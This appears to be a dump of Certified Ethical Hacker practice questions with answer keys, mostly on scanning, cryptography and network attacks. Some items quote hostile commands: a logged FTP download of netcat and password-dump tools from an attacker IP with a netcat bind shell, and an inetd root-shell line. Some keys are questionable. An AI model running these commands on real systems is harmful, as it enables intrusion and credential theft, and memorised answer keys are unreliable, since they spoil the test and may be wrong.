d. Firewalls will permit inbound TCP packets to specific ports that hosts sitting behind the firewall are listening for connections. By sending out TCP SYN packets instead of ICMP ECHO packets, traceroute can bypass the most common firewall filters.

A certified ethical hacker (CEH) completed a penetration test of the main headquarters of a company almost two months ago, but has yet to get paid. The customer is suffering from financial problems, and the CEH is worried that the company will go out of business and end up not paying. What actions should the CEH take? a. Threaten to publish the penetration test results if not paid. b. Tell other customers of the financial problems with payments from this company. c. Exploit some of the vulnerabilities found on the company webserver to deface it. d. Follow proper legal procedures against the company to request payment.

d. Follow proper legal procedures against the company to request payment.

Network Intrusion Detection systems can monitor traffic in real time on networks. Which one of the following techniques can be very effective at avoiding proper detection? a. Use of only TCP based protocols. b. Use of fragmented ICMP traffic only. c. Use of only UDP based protocols. d. Fragmentation of packets.

d. Fragmentation of packets.

Fred is the network administrator for his company. Fred is testing an internal switch. From an external IP address, Fred wants to try and trick this switch into thinking it already has established a session with his computer. How can Fred accomplish this? a. Fred can send an IP packet with the ACK bit set to zero and the source address of the switch. b. He can send an IP packet with the SYN bit and the source address of his computer. c. Fred can accomplish this by sending an IP packet with the RST/SIN bit and the source address of his computer. d. Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

d. Fred can send an IP packet to the switch with the ACK bit and the source address of his machine.

Once an intruder has gained access to a remote system with a valid username and password, the attacker will attempt to increase his privileges by escalating the used account to one that has increased privileges. such as that of an administrator. What would be the best countermeasure to protect against escalation of priveges? a. Give users tokens b. Give users a strong policy document c. Give users two passwords d. Give user the least amount of privileges

d. Give user the least amount of privileges

Blake is in charge of securing all 20 of his company's servers. He has enabled hardware and software firewalls, hardened the operating systems, and disabled all unnecessary services on all the servers. Unfortunately, there is proprietary AS400 emulation software that must run on one of the servers that requires the telnet service to function properly. Blake is especially concerned about this since telnet can be a very large security risk in an organization. Blake is concerned about how this particular server might look to an outside attacker so he decides to perform some footprinting, scanning, and penetration tests on the server. Blake telnets into the server using Port 80 and types in the following command: HEAD / HTTP/1.0 After pressing enter twice, Blake gets the following results: What has Blake just accomplished? Picture: (Test 3 #33) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-238.gif a. Poisoned the local DNS cache of the server b. Downloaded a file to his local computer c. Submitted a remote command to crash the server d. Grabbed the Operating System banner

d. Grabbed the Operating System banner

To reduce the attack surface of a system, administrators should perform which of the following processes to remove unnecessary software, services, and insecure configuration settings? a. Stealthing b. Windowing c. Harvesting d. Hardening

d. Hardening

If a tester is attempting to ping a target that exists but receives no response or a response that states the destination is unreachable, ICMP may be disabled and the network may be using TCP. Which other option could the tester use to get a response from a host using TCP? a. Traceroute b. TCP ping c. Broadcast ping d. Hping

d. Hping

When Nmap performs a ping sweep, which of the following sets of requests does it send to the target device? a. ICMP ECHO_REQUEST & TCP SYN b. ICMP ECHO_REPLY & TFP RST c. ICMP ECHO_REPLY & TCP FIN d. ICMP ECHO_REQUEST & TCP ACK

d. ICMP ECHO_REQUEST & TCP ACK

Snort is an open source Intrusion Detection system. However, it can also be used for a few other purposes as well. Which of the choices below indicate the other features offered by Snort? a. IDS,Sniffer,Proxy b. IDS,Sniffer,content inspector c. IDS,Firewall,Sniffer d. IDS,Packet Logger,Sniffer

d. IDS,Packet Logger,Sniffer

If the final set of security controls does not eliminate all risk in a system, what could be done next? a. Continue to apply controls until there is zero risk. b. Remove current controls since they are not completely effective. c. Ignore any remaining risk. d. If the residual risk is low enough,it can be accepted.

d. If the residual risk is low enough,it can be accepted.

You are the security administrator of Jaco Banking Systems located in Boston. You are setting up e-banking website (http://www.ejacobank.com) authentication system. Instead of issuing banking customer with a single password, you give them a printed list of 100 unique passwords. Each time the customer needs to log into the e-banking system website, the customer enters the next password on the list. If someone sees them type the password using shoulder surfing, MiTM or keyloggers, then no damage is done because the password will not be accepted a second time. Once the list of 100 passwords is almost finished, the system automatically sends out a new password list by encrypted e-mail to the customer. You are confident that this security implementation will protect the customer from password abuse. Two months later, a group of hackers called "HackJihad" found a way to access the one-time password list issued to customers of Jaco Banking Systems. The hackers set up a fake website (http://www.e-jacobank.com) and used phishing attacks to direct ignorant customers to it. The fake website asked users for their e-banking username and password, and the next unused entry from their one-time password sheet. The hackers collected 200 customer's username/passwords this way. They transferred money from the customer's bank account to various offshore accounts. Your decision of password policy implementation has cost the bank with USD 925, 000 to hackers. You immediately shut down the e-banking website while figuring out the next best security solution. What effective security solution will you recommend in this case? a. Enable a complex password policy of 20 characters and ask the user to change the password immediately after they logon and do not store password histories b. Implement Biometrics based password authentication system. Record the customers face image to the authentication database c. Configure your firewall to block logon attempts of more than three wrong tries d. Implement RSA SecureID based authentication system

d. Implement RSA SecureID based authentication system

Which type of attack is port scanning? a. Denial of service attack b. Web server attack c. Unauthorized access d. Information gathering

d. Information gathering

What technique is used to perform a Connection Stream Parameter Pollution (CSPP) attack? a. Inserting malicious Javascript code into input parameters b. Adding multiple parameters with the same name in HTTP requests c. Setting a user's session identifier (SID) to an explicit known value d. Injecting parameters into a connection string using semicolons as a separator

d. Injecting parameters into a connection string using semicolons as a separator

Harold just got home from working at Henderson LLC where he works as an IT technician. He was able to get off early because they were not too busy. When he walks into his home office, he notices his teenage daughter on the computer, apparently chatting with someone online. As soon as she hears Harold enter the room, she closes all her windows and tries to act like she was playing a game. When Harold asks her what she was doing, she acts very nervous and does not give him a straight answer. Harold is very concerned because he does not want his daughter to fall victim to online predators and the sort. Harold doesn't necessarily want to install any programs that will restrict the sites his daughter goes to, because he doesn't want to alert her to his trying to figure out what she is doing. Harold wants to use some kind of program that will track her activities online, and send Harold an email of her activity once a day so he can see what she has been up to. What kind of software could Harold use to accomplish this? a. Install hardware Keylogger on her computer b. Install VNC on her computer c. Enable Remote Desktop on her computer d. Install screen capturing Spyware on her computer

d. Install screen capturing Spyware on her computer

War dialing is a very old attack and depicted in movies that were made years ago. Why would a modem security tester consider using such an old technique? a. It is cool,and if it works in the movies it must work in real life. b. A good security tester would not use such a derelict technique. c. It allows circumvention of the company PBX. d. It allows circumvention of protection mechanisms by being on the internal network.

d. It allows circumvention of protection mechanisms by being on the internal network.

What does an ICMP (Code 13) message normally indicates? a. It indicates to the host that the datagram which triggered the source quench message will need to be re-sent b. It is a request to the host to cut back the rate at which it is sending traffic to the Internet destination c. It indicates that the destination host is unreachable d. It indicates that the packet has been administratively dropped in transit

d. It indicates that the packet has been administratively dropped in transit

What is the primary drawback to using advanced encryption standard (AES) algorithm with a 256 bit key to share sensitive data? a. It has been proven to be a weak cipher; therefore,should not be trusted to protect sensitive data. b. Due to the key size,the time it will take to encrypt and decrypt the message hinders efficient communication. c. To get messaging programs to function with this algorithm requires complex configurations. d. It is a symmetric key algorithm,meaning each recipient must receive the key through a different channel than the message.

d. It is a symmetric key algorithm,meaning each recipient must receive the key through a different channel than the message.

Why would an ethical hacker use the technique of firewalking? a. It is a technique used to map routers on a network link. b. It is a technique used to discover interfaces in promiscuous mode. c. It is a technique used to discover wireless network on foot. d. It is a technique used to discover the nature of rules configured on a gateway.

d. It is a technique used to discover the nature of rules configured on a gateway.

Which of the following best describes session key creation in SSL? a. It is created by the server after verifying the user's identity b. It is created by the server upon connection by the client c. It is created by the client from the server's public key d. It is created by the client after verifying the server's identity

d. It is created by the client after verifying the server's identity

Bob wants to prevent attackers from sniffing his passwords on the wired network. Which of the following lists the best options? a. SMB,SMTP,Smart card b. SSID,WEP,Kerberos c. RSA,LSA,POP d. Kerberos,Smart card,Stanford SRP

d. Kerberos,Smart card,Stanford SRP

What statement is true regarding LM hashes? a. Uppercase characters in the password are converted to lowercase. b. LM hashes are based on AES128 cryptographic standard. c. LM hashes consist in 48 hexadecimal characters. d. LM hashes are not generated when the password length exceeds 15 characters.

d. LM hashes are not generated when the password length exceeds 15 characters.

You have successfully run a buffer overflow attack against a default IIS installation running on a Windows 2000 Server. The server allows you to spawn a shell. In order to perform the actions you intend to do, you need elevated permission. You need to know what your current privileges are within the shell. Which of the following options would be your current privileges? a. Administrator b. IUSR_COMPUTERNAME c. Whatever account IIS was installed with d. LOCAL_SYSTEM

d. LOCAL_SYSTEM

What are the three types of compliance that the Open Source Security Testing Methodology Manual (OSSTMM) recognizes? a. Legal, performance, audit b. Contractual, regulatory, industry c. Audit, standards based, regulatory d. Legislative, contractual, standards based

d. Legislative, contractual, standards based

Paul has just finished setting up his wireless network. He has enabled numerous security features such as changing the default SSID, enabling WPA encryption, and enabling MAC filtering on his wireless router. Paul notices that when he uses his wireless connection, the speed is sometimes 54 Mbps and sometimes it is only 24Mbps or less. Paul connects to his wireless router's management utility and notices that a machine with an unfamiliar name is connected through his wireless connection. Paul checks the router's logs and notices that the unfamiliar machine has the same MAC address as his laptop. What is Paul seeing here? a. ARP spoofing b. Macof c. DNS spoofing d. MAC spoofing

d. MAC spoofing

_________ ensures that the enforcement of organizational security policy does not rely on voluntary web application user compliance. It secures information by assigning sensitivity labels on information and comparing this to the level of security a user is operating at. a. Role-based Access Control b. Discretionary Access Control c. Authorized Access Control d. Mandatory Access Control

d. Mandatory Access Control

What framework architecture is shown in this exhibit? Picture: (Test 2 #8) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-114.gif a. Nessus b. Immunity Canvas c. Core Impact d. Metasploit

d. Metasploit

Windows file servers commonly hold sensitive files, databases, passwords and more. Which of the following choices would be a common vulnerability that usually exposes them? a. SQL injection b. Cross-site scripting c. CRLF injection d. Missing patches

d. Missing patches

Which of the following open source tools would be the best choice to scan a network for potential targets? a. John the Ripper b. NIKTO c. CAIN d. NMAP

d. NMAP

You are scanning into the target network for the first time. You find very few conventional ports open. When you attempt to perform traditional service identification by connecting to the open ports, it yields either unreliable or no results. You are unsure of which protocols are being used. You need to discover as many different protocols as possible. Which kind of scan would you use to achieve this? (Choose the best answer) a. Nmap scan with the -sP (Ping scan) switch. b. Netcat scan with the -u -e switches. c. Nessus scan with TCP based pings. d. Nmap with the -sO (Raw IP packets) switch.

d. Nmap with the -sO (Raw IP packets) switch.

What is the expected result of the following exploit? Picture: (Test 9 #14) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-802.gif a. Creates a share called "sasfile" on the target system. b. Creates an account with a user name of Anonymous and a password of [email protected]. c. Create a FTP server with write permissions enabled. d. Opens up a telnet listener that requires no username or password.

d. Opens up a telnet listener that requires no username or password.

Attackers target HINFO record types stored on a DNS server to enumerate information. These are information records and potential source for reconnaissance. A network administrator has the option of entering host information specifically the CPU type and operating system when creating a new DNS record. An attacker can extract this type of information easily from a DNS server. Which of the following commands extracts the HINFO record? Picture: (Test 1 #88) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-082.gif a. Option D b. Option C c. Option B d. Option A

d. Option A

Bluetooth uses which digital modulation technique to exchange information between paired devices? a. ASK (amplitude-shift keying) b. FSK (frequency-shift keying) c. QAM (quadrature amplitude modulation) d. PSK (phase-shift keying)

d. PSK (phase-shift keying)

Ivan is auditing a corporate website. Using Winhex, he alters a cookie as shown below. Before Alteration: Cookie: lang=en-us; ADMIN=no; y=1 ; time=10:30GMT ; After Alteration: Cookie: lang=en-us; ADMIN=yes; y=1 ; time=12:30GMT ; What attack is being depicted here? a. Cookie Stealing b. Cross Site Scripting c. Session Hijacking d. Parameter Manipulation

d. Parameter Manipulation

Some passwords are stored using specialized encryption algorithms known as hashes. Why is this an appropriate method? a. It is impossible to crack hashed user passwords unless the key used to encrypt them is obtained. b. If a user forgets the password,it can be easily retrieved using the hash key stored by administrators. c. Hashing is faster compared to more traditional encryption algorithms. d. Passwords stored using hashes are non-reversible,making finding the password much more difficult.

d. Passwords stored using hashes are non-reversible,making finding the password much more difficult.

Which method can provide a better return on IT security investment and provide a thorough and comprehensive assessment of organizational security covering policy, procedure design, and implementation? a. Social engineering b. Vulnerability scanning c. Access control list reviews d. Penetration testing

d. Penetration testing

What type of attack changes its signature and/or payload to avoid detection by antivirus programs? a. Rootkit b. Boot sector c. File infecting d. Polymorphic

d. Polymorphic

What are the three phases involved in security testing? a. Reconnaissance, Conduct,Report b. Preparation, Conduct,Billing c. Reconnaissance, Scanning,Conclusion d. Preparation, Conduct,Conclusion

d. Preparation,Conduct,Conclusion

Which of the following is a characteristic of Public Key Infrastructure (PKI)? a. Public-key cryptosystems do not require a secure key distribution channel. b. Public-key cryptosystems do not provide technical non-repudiation via digital signatures. c. Public-key cryptosystems are faster than symmetric-key cryptosystems. d. Public-key cryptosystems distribute public-keys within digital signatures.

d. Public-key cryptosystems distribute public-keys within digital signatures.

Johnny is a member of the hacking group Orpheus1. He is currently working on breaking into the Department of Defense's front end Exchange Server. He was able to get into the server, located in a DMZ, by using an unused service account that had a very weak password that he was able to guess. Johnny wants to crack the administrator password, but does not have a lot of time to crack it. He wants to use a tool that already has the LM hashes computed for all possible permutations of the administrator password. What tool would be best used to accomplish this? a. SmurfCrack b. PSCrack c. SMBCrack d. RainbowTables

d. RainbowTables

To send a PGP encrypted message, which piece of information from the recipient must the sender have before encrypting the message? a. Sender's public key b. Master encryption key c. Recipient's private key d. Recipient's public key

d. Recipient's public key

Which element of Public Key Infrastructure (PKI) verifies the applicant? a. Verification authority b. Validation authority c. Certificate authority d. Registration authority

d. Registration authority

The following is a sample of output from a penetration tester's machine targeting a machine with the IP address of 192.168.1.106: Picture: (Test 5 #74) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-475.gif What is most likely taking place? a. Ping sweep of the 192.168.1.106 network b. Port scan of 192.168.1.106 c. Denial of service attack on 192.168.1.106 d. Remote service brute force attempt

d. Remote service brute force attempt

A company has publicly hosted web applications and an internal Intranet protected by a firewall. Which technique will help protect against enumeration? a. Allow full DNS zone transfers. b. Enable null session pipes. c. Reject all invalid email received via SMTP. d. Remove A records for internal hosts.

d. Remove A records for internal hosts.

Which results will be returned with the following Google search query? site:target.com -site:Marketing.target.com accounting a. Results matching all words in the query b. Results from matches on the site marketing.target.com that are in the domain target.com but do not include the word accounting c. Results for matches on target.com and Marketing.target.com that include the word "accounting" d. Results matching "accounting" in domain target.com but not on the site Marketing.target.com

d. Results matching "accounting" in domain target.com but not on the site Marketing.target.com

In order to attack a wireless network, you put up an access point and override the signal of the real access point. As users send authentication data, you are able to capture it. What kind of attack is this? a. WEP attack b. Unauthorized access point attack c. Drive by hacking d. Rogue access point attack

d. Rogue access point attack

_________ is a tool that can hide processes from the process list, can hide files, registry entries, and intercept keystrokes. a. Scanner b. DoS tool c. Trojan d. RootKit e. Backdoor

d. RootKit

You suspect that your Windows machine has been compromised with a Trojan virus. When you run anti-virus software it does not pick of the Trojan. Next you run netstat command to look for open ports and you notice a strange port 6666 open. What is the next step you would do? a. Install and run Trojan removal software. b. Re-install the operating system. c. Re-run anti-virus software. d. Run utility fport and look for the application executable that listens on port 6666.

d. Run utility fport and look for the application executable that listens on port 6666.

Which of the following algorithms provides better protection against brute force attacks by using a 160-bit message digest? a. MD5 b. MD4 c. RC4 d. SHA-1

d. SHA-1

A zone file consists of which of the following Resource Records (RRs)? a. SOA,NS,AXFR,and MX records b. DNS,NS,PTR,and MX records c. DNS,NS,AXFR,and MX records d. SOA,NS,A,and MX records

d. SOA,NS,A,and MX records

SSL has been seen as the solution to a lot of common security problems. Administrator will often time make use of SSL to encrypt communications from points A to point B. Why do you think this could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic between point A and B? a. SSL is redundant if you already have IDS's in place b. SSL will trigger rules at regular interval and force the administrator to turn them off c. SSL will slow down the IDS while it is breaking the encryption to see the packet content d. SSL will blind the content of the packet and Intrusion Detection Systems will not be able to detect them

d. SSL will blind the content of the packet and Intrusion Detection Systems will not be able to detect them

In TCP communications there are 8 flags; FIN, SYN, RST, PSH, ACK, URG, ECE, CWR. These flags have decimal numbers assigned to them: FIN = 1 SYN = 2 RST = 4 PSH = 8 ACK = 16 URG = 32 ECE = 64 CWR =128 Jason is the security administrator of ASPEN Communications. He analyzes some traffic using Wireshark and has enabled the following filters. ((tcp.flags == 0x02) || (tcp.flags == 0x12) ) || ((tcp.flags == 0x10) && (tcp.ack==1) && (tcp.len==0)) What is Jason trying to accomplish here? a. ACK, ACK, SYN, URG b. SYN, FIN, URG AND PSH c. RST, PSH/URG, FIN d. SYN, SYN/ACK, ACK

d. SYN, SYN/ACK, ACK

What sequence of packets is sent during the initial TCP three-way handshake? a. FIN,FIN-ACK,ACK b. SYN,URG,ACK c. SYN,ACK,SYN-ACK d. SYN,SYN-ACK,ACK

d. SYN,SYN-ACK,ACK

In TCP communications there are 8 flags; FIN, SYN, RST, PSH, ACK, URG, ECE, CWR. These flags have decimal numbers assigned to them: FIN = 1 SYN = 2 RST = 4 PSH = 8 URG = 32 ECE = 64 CWR = 128 Jason is the security administrator of ASPEN Communications. He analyzes some traffic using Wireshark and has enabled the following filters. What is Jason trying to accomplish here? a. ACK,ACK,SYN,URG b. RST,PSH/URG,FIN c. SYN,FIN,URG and PSH d. SYN,SYN/ACK,ACK

d. SYN,SYN/ACK,ACK

Which United States legislation mandates that the Chief Executive Officer (CEO) and the Chief Financial Officer (CFO) must sign statements verifying the completeness and accuracy of financial reports? a. Federal Information Security Management Act (FISMA) b. Fair and Accurate Credit Transactions Act (FACTA) c. Gramm-Leach-Bliley Act (GLBA) d. Sarbanes-Oxley Act (SOX)

d. Sarbanes-Oxley Act (SOX)

Your computer is infected by E-mail tracking and spying Trojan. This Trojan infects the computer with a single file - emos.sys. Picture: (Test 1 #48) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-052.gif a. Scan for suspicious startup programs using msconfig b. Scan for suspicious network activities using Wireshark c. Scan for suspicious open ports using netstat d. Scan for suspicious device drivers in c:\windows\system32\drivers

d. Scan for suspicious device drivers in c:\windows\system32\drivers

Which of the following processes evaluates the adherence of an organization to its stated security policy? a. Penetration testing b. Risk assessment c. Vulnerability assessment d. Security auditing

d. Security auditing

After a client sends a connection request (SYN) packet to the server, the server will respond (SYN-ACK) with a sequence number of its choosing, which then must be acknowledged (ACK) by the client. This sequence number is predictable; the attack connects to a service first with its own IP address, records the sequence number chosen, and then opens a second connection from a forged IP address. The attack doesn't see the SYN-ACK (or any other packet) from the server, but can guess the correct responses. If the source IP address is used for authentication, then the attacker can use the one-sided communication to break into the server. What attacks can you successfully launch against a server using the above technique? a. IP spoofing attacks b. Denial of Service attacks c. Web page defacement attacks d. Session Hijacking attacks

d. Session Hijacking attacks

Which of the following is a preventive control? a. Audit trail b. Continuity of operations plan c. Security policy d. Smart card authentication

d. Smart card authentication

Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply packets that are being received on the external gateway interface. Further inspection reveals that they are not responses from the internal hosts' requests but simply responses coming from the Internet. What could be the most likely cause? a. Someone has spoofed Clive's IP address while doing a DoS attack. b. Someone has spoofed Clive's IP address while doing a land attack. c. Someone has spoofed Clive's IP address while doing a fraggle attack. d. Someone has spoofed Clive's IP address while doing a smurf attack.

d. Someone has spoofed Clive's IP address while doing a smurf attack.

Which address translation scheme would allow a single public IP address to always correspond to a single machine on an internal network, allowing "server publishing"? a. Overloading Port Address Translation b. Dynamic Network Address Translation c. Dynamic Port Address Translation d. Static Network Address Translation

d. Static Network Address Translation

Switches maintain a CAM Table that maps individual MAC addresses on the network to physical ports on the switch. Picture: (Test 2 #92) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-187.gif In MAC flooding attack, a switch is fed with many Ethernet frames, each containing different source MAC addresses, by the attacker. Switches have a limited memory for mapping various MAC addresses to physical ports. What happens when the CAM table becomes full? a. The CAM overflow table will cause the switch to crash causing Denial of Service b. The switch replaces outgoing frame switch factory default MAC address of FF:FF:FF:FF:FF:FF c. Every packet is dropped and the switch sends out SNMP alerts to the IDS port d. Switch then acts as hub by broadcasting packets to all machines on the network

d. Switch then acts as hub by broadcasting packets to all machines on the network

You have just installed a new Linux file server at your office. This server is going to be used by several individuals in the organization, and unauthorized personnel must not be able to modify any data. What kind of program can you use to track changes to files on the server? a. Personal Firewall b. Network Based IDS (NIDS) c. Linux IP Chains d. System Integrity Verifier (SIV)

d. System Integrity Verifier (SIV)

During a penetration test, a tester finds that the web application being analyzed is vulnerable to Cross Site Scripting (XSS). Which of the following conditions must be met to exploit this vulnerability? a. The web application does not have the secure flag set. b. The victim user should not have an endpoint security solution. c. The victim's browser must have ActiveX technology enabled. d. The session cookies do not have the HttpOnly flag set.

d. The session cookies do not have the HttpOnly flag set.

Gerald, the Systems Administrator for Hyped Enterprises, has just discovered that his network has been breached by an outside attacker. After performing routine maintenance on his servers, he discovers numerous remote tools were installed that no one claims to have knowledge of in his department. Gerald logs onto the management console for his IDS and discovers an unknown IP address that scanned his network constantly for a week and was able to access his network through a high-level port that was not closed. Gerald traces the IP address he found in the IDS log to a proxy server in Brazil. Gerald calls the company that owns the proxy server and after searching through their logs, they trace the source to another proxy server in Switzerland. Gerald calls the company in Switzerland that owns the proxy server and after scanning through the logs again, they trace the source back to a proxy server in China. What proxy tool has Gerald's attacker used to cover their tracks? a. IAS proxy b. Cheops proxy c. ISA proxy d. TOR proxy

d. TOR proxy

Jake from State Farm works as a system administrator at Acme Corp. Jason, an accountant of the firm befriends him at the canteen and tags along with him on the pretext of appraising him about potential tax benefits. Jason waits for Jake to swipe his access card and follows him through the open door into the secure systems area. How would you describe Jason's behavior within a security context? a. Smooth Talking b. Swipe Gating c. Trailing d. Tailgating

d. Tailgating

What is the problem with this ASP script (login.asp)? Picture: (Test 1 #39) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-038.gif a. The ASP script is vulnerable to Session Splice attack b. The ASP script is vulnerable to XSS attack c. The ASP script is vulnerable to Cross Site Scripting attack d. The ASP script is vulnerable to SQL Injection attack

d. The ASP script is vulnerable to SQL Injection attack

Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been able to spawn an interactive shell and plans to deface the main web page. He first attempts to use the "echo" command to simply overwrite index.html and remains unsuccessful. He then attempts to delete the page and achieves no progress. Finally, he tries to overwrite it with another page in which also he remains unsuccessful. What is the probable cause of Bill's problem? a. The system is a honeypot b. There is a problem with the shell and he needs to run the attack again c. You cannot use a buffer overflow to deface a web page d. The HTML file has permissions of read only

d. The HTML file has permissions of read only

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The file Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini. He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CM~EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below: Picture: (Test 8 #57) *cmd1.exe /c open 213.116.251.162>ftpcom* *cmd1.exe /c echo johna2k >>ftpcom* *cmd1.exe /c echo haxedj00 >>ftpcom* *cmd1.exe /c echo get nc.exe >>ftpcom* *cmd1.exe /c echo get pdump.exe >>ftpcom* *cmd1.exe /c echo samdump.dll >>ftpcom* *cmd1.exe /c echo quit >>ftpcom* *cmd1.exe /c ftp - s:ftpcom" *cmd1.exe / nc -l -p 6969 -e cmd1.exe" What can you infer from the exploit given? a. It is a local exploit where the attacker logs in using username johna2k. b. There are two attackers on the system - johna2k and haxedj00. c. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port. d. The attack is a remote exploit and the hacker downloads three files.

d. The attack is a remote exploit and the hacker downloads three files.

Study the following exploit code taken from a Linux machine and answer the questions below: echo "ingreslock stream tcp nowait root /bin/sh sh -I" > /tmp/x; /usr/sbin/inetd -s /tmp/x; sleep 10; /bin/ rm -f /tmp/x AAAA...AAA In the above exploit code, the command "/bin/sh sh -I" is given. What is the purpose, and why is 'sh' shown twice? a. It is a giveaway by the attacker that he is a script kiddy. b. The length of such a buffer overflow exploit makes it prohibitive for user to enter manually. The second 'sh' automates this function. c. It checks for the presence of a codeword (setting the environment variable) among the environment variables. d. The command /bin/sh sh -i appearing in the exploit code is actually part of an inetd configuration file.

d. The command /bin/sh sh -i appearing in the exploit code is actually part of an inetd configuration file.

An Nmap scan shows the following open ports, and nmap also reports that the OS guessing results to match too many signatures hence it cannot reliably be identified: 21 ftp 23 telnet 80 http 443 https What does this suggest? a. This is a Windows Domain Controller b. The host is not firewalled c. The host is not a Linux or Solaris system d. The host is not properly patched

d. The host is not properly patched

The fundamental difference between symmetric and asymmetric key cryptographic systems is that symmetric key cryptography uses which of the following? a. Multiple keys for non-repudiation of bulk data b. Different keys on both ends of the transport medium c. Bulk encryption for data transmission over fiber d. The same key on each end of the transmission medium

d. The same key on each end of the transmission medium

Clive is conducting a pen-test and has just port scanned a system on the network. He has identified the operating system as Linux and been able to elicit responses from ports 23, 25 and 53. He infers port 23 as running Telnet service, port 25 as running SMTP service and port 53 as running DNS service. The client confirms these findings and attests to the current availability of the services. When he tries to telnet to port 23 or 25, he gets a blank screen in response. On typing other commands, he sees only blank spaces or underscores symbols on the screen. What are you most likely to infer from this? a. This indicates that the telnet and SMTP server have crashed b. An attacker has replaced the services with trojaned ones c. There is a honeypot running on the scanned machine d. The services are protected by TCP wrappers

d. The services are protected by TCP wrappers

Why attackers use proxy servers? a. Faster bandwidth performance and increase in attack speed b. Interrupt the remote victim's network traffic and reroute the packets to attackers machine c. To ensure the exploits used in the attacks always flip reverse vectors d. To hide the source IP address so that an attacker can hack without any legal corollary

d. To hide the source IP address so that an attacker can hack without any legal corollary

Nathan is testing some of his network devices. Nathan is using Macof to try and flood the ARP cache of these switches. If these switches' ARP cache is successfully flooded, what will be the result? a. The switches will route all traffic to the broadcast address created collisions. b. Depending on the switch manufacturer,the device will either delete every entry in its ARP cache or reroute packets to the nearest switch. c. If the ARP cache is flooded,the switches will drop into pix mode making it less susceptible to attacks. d. The switches will drop into hub mode if the ARP cache is successfully flooded.

d. The switches will drop into hub mode if the ARP cache is successfully flooded.

What do you conclude from the nmap results below? Staring nmap V. 3.10ALPHA0 (www.insecure.org/map/) (The 1592 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 25/tcp open smtp 80/tcp open http 443/tcp open https Remote operating system guess: Too many signatures match the reliability guess the OS. Nmap run completed - 1 IP address (1 host up) scanned in 91.66 seconds a. The system is a Windows Domain Controller. b. The system is not running Linux or Solaris. c. The system is not properly patched. d. The system is not firewalled.

d. The system is not firewalled.

You are gathering competitive intelligence on XYZ.com. You notice that they have jobs listed on a few Internet job-hunting sites. There are two job postings for network and system administrators. How can this help you in footprint the organization? _____ a. An understanding of the number of employees in the company b. The IP range used by the target network c. How strong the corporate security policy is d. The types of operating systems and applications being used.

d. The types of operating systems and applications being used.

You are the security administrator for a large network. You want to prevent attackers from running any sort of traceroute into your DMZ and discover the internal structure of publicly accessible areas of the network. How can you achieve this? a. Block UDP at the firewall. b. Block ICMP at the firewall. c. Both A and B d. There is no way to completely block doing a trace route into this area.

d. There is no way to completely block doing a trace route into this area.

Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? a. They have been able to compromise the firewall,modify the rules,and give themselves proper access b. They are using an older version of Internet Explorer that allow them to bypass the proxy server c. They are using UDP that is always authorized at the firewall d. They are using HTTP tunneling software that allows them to communicate with protocols in a way it was not intended

d. They are using HTTP tunneling software that allows them to communicate with protocols in a way it was not intended

Neil is closely monitoring his firewall rules and logs on a regular basis. Some of the users have complained to Neil that there are a few employees who are visiting offensive web site during work hours, without any consideration for others. Neil knows that he has an up-to-date content filtering system and such access should not be authorized. What type of technique might be used by these offenders to access the Internet without restriction? a. They have been able to compromise the firewall,modify the rules,and give themselves proper access b. They are using an older version of Internet Explorer that allow them to bypass the proxy server c. They are using UDP that is always authorized at the firewall d. They are using tunneling software that allows them to communicate with protocols in a way it was not intended

d. They are using tunneling software that allows them to communicate with protocols in a way it was not intended

What is the main advantage that a network-based IDS/IPS system has over a host-based solution? a. They will not interfere with user interfaces. b. They are placed at the boundary,allowing them to inspect all traffic. c. They are easier to install and configure. d. They do not use host system resources.

d. They do not use host system resources.

Which of the following is an advantage of utilizing security testing methodologies to conduct a security audit? a. Anyone can run the command line scripts. b. They are subject to government regulation. c. They are available at low cost. d. They provide a repeatable framework.

d. They provide a repeatable framework.

Which technical characteristic do Ethereal/Wireshark, TCPDump, and Snort have in common? a. They use the same packet analysis engine. b. They send alerts to security monitors. c. They are written in Java. d. They use the same packet capture utility.

d. They use the same packet capture utility.

Exhibit Picture: (Test 6 #67) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-573.gif Snort has been used to capture packets on the network. On studying the packets, the penetration tester finds it to be abnormal. If you were the penetration tester, why would you find this abnormal? What is odd about this attack? Choose the best answer. a. This is not a spoofed packet as the IP stack has increasing numbers for the three flags. b. The attacker wants to avoid creating a sub-carries connection that is not normally valid. c. These packets were crafted by a tool,they were not created by a standard IP stack. d. This is back orifice activity as the scan comes form port 31337.

d. This is back orifice activity as the scan comes form port 31337.

Which of the following lists are valid data-gathering activities associated with a risk assessment? a. Threat identification,response identification,mitigation identification b. Attack profile,defense profile,loss profile c. System profile,vulnerability identification,security determination d. Threat identification,vulnerability identification,control analysis

d. Threat identification,vulnerability identification,control analysis

What does ICMP (type 11, code 0) denote? a. Destination Unreachable b. Source Quench c. Unknown Type d. Time Exceeded

d. Time Exceeded

Which NMAP feature can a tester implement or adjust while scanning for open ports to avoid detection by the network's IDS? a. Fingerprinting to identify which operating systems are running on the network b. ICMP ping sweep to determine which hosts on the network are not available c. Traceroute to control the path of the packets sent during the scan d. Timing options to slow the speed that the port scan is conducted

